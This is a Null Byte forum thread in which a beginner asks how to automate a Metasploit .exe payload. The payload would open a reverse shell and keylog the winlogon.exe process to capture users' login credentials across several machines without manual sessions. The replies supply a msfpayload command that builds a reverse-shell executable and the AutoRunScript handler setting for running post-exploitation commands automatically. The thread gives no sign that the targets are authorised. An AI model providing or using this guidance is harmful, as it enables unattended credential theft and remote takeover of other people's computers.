Hello everyone,
Firstly I would like to introduce myself; I'm indianam, I'm new to hacking, and I'm looking forward to learning more about penetration testing and the different aspects of cyber security.
Secondly, I have a question regarding making Metasploit .exe's that automatically perform tasks. For example, if I wanted to make a .exe payload that would install a key logger attached to the winlogon.exe process and store the results in a file or send them back to my machine so as to find a user's credentials without having to crack them, how could I automate it so that all of this could be performed without having to open a meterpreter session and doing it all manually? I may not be able to know when they would run this .exe file, so I can't just sit around at my computer all day with a listener open.
I've read up on making a .rc file but I can't figure out how to make it work without the need for manual intervention. I feel like this could be very useful when attacking multiple machines at the same time since I wouldn't be able to manage all the sessions at once. Or, if you don't know when they will run the .exe, it would serve as an automatic way to collect information and run payloads.
Thanks for all the help,
Sincerely,
Indiana Moreau
************Solution**************
With the help of the wonderful people here at Null Byte I was able to solve my issue using the AutoRunScript option, which allows you to automatically run commands post-exploit. I put the link to an article explaining it a bit better at the bottom of the article. Thanks everyone for all the great help, I am very grateful :)
AutoRunScript | offensive Infosec Blog
Please start here.
ghost_
Thanks for the article, I looked through it and it has tons of great stuff!
I have looked through quite a few articles in the past couple of weeks but I have yet to find an article which talks about making automatic .exe files.
Thanks for the article, it was really helpful :)
I don't quite understand what you mean by an automatic .exe file, you're being very vague with the question.
However, with your skill level, you need to start from the beginning. This is why I posted that link; you have to learn to walk before you can run.
ghost_
Sorry about that, I'll try to explain myself better. I've been at Null Byte for the past couple of weeks and have looked through lots of the tutorials here and they're all great, but they mainly focus on single machine attacks and I was trying to find a way to attack multiple machines, but it causes an issue since I can't always be monitoring each meterpreter session individually. The solution that I thought might work would be to turn the meterpreter payload into a .exe using something similar to this.
msfpayload windows/shell_reverse_tcp X > /tmp/1.exe
Using the X command I can transfer the reverse shell payload into an .exe file that, when run on the target machine, will attempt to connect back to my machine.
The issue with this is that I can turn payloads into .exe files but I can't find a way to automate commands to run in those payloads after they're on the target's computer without opening a meterpreter session and manually running the keyscan command attached to the winlogon.exe process (so that it only key logs the login credentials).
If you know of another way to attack multiple machines effectively I would love to learn. Thank you very much for your help and I'll keep reading different tutorials to see if I can find a way to do this.
Have you considered writing a meterpreter script?
I've looked into it but it still requires me to connect to the meterpreter session and then run the script. If there was a way to run the script without the need for me to open the sessions manually that would solve my issues, but I haven't been able to find a way to do that yet.
Look at this page:
Meterpreter Scripting
You can usually set an automatic task to be run with the exploit/multi/handler by using
set AutoRunScript multi_console_command -rc /root/yourfile.rc
Thanks for the article, I think I will be taking the meterpreter scripting approach, not quite exactly what I was looking for but I think it should work fine, thanks :)
No problem.
When you play with modules in the cli, be sure to use "show advanced" as well as "show options" so that you can see the more advanced options of the module!